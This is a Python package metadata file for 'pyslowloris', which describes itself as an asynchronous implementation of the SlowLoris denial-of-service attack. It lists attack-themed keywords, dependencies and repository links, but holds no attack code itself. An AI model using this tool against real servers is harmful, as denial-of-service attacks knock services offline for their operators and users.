Metadata-Version: 2.1
Name: pyslowloris
Version: 2.0.3
Summary: Asynchronous Python implementation of SlowLoris DoS attack
Home-page: https://github.com/maxkrivich/SlowLoris
License: MIT
Keywords: SlowLoris,dos,slowloris,apache,dos-attacks,denial-of-service,http,exploit,dos-tool,hacker-scripts,hacking-tool,hacking,vulnerability,slow-requests,cybersecurity,cyber-security,information-security,security
Author: Maxim Krivich
Author-email: maxkrivich@gmail.com
Requires-Python: >=3.9,<4.0
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: End Users/Desktop
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: MIT License
Classifier: Natural Language :: English
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Requires-Dist: fake-useragent (>=0.1.11,<1.6.0)
Requires-Dist: jk-triologging (>=0.2019.10,<0.2020.0)
Requires-Dist: sh (>=1.14.0,<2.0.0)
Requires-Dist: trio (>=0.16,<0.26)
Project-URL: Bug Tracker, https://github.com/maxkrivich/SlowLoris/issues
Project-URL: Repository, https://github.com/maxkrivich/SlowLoris
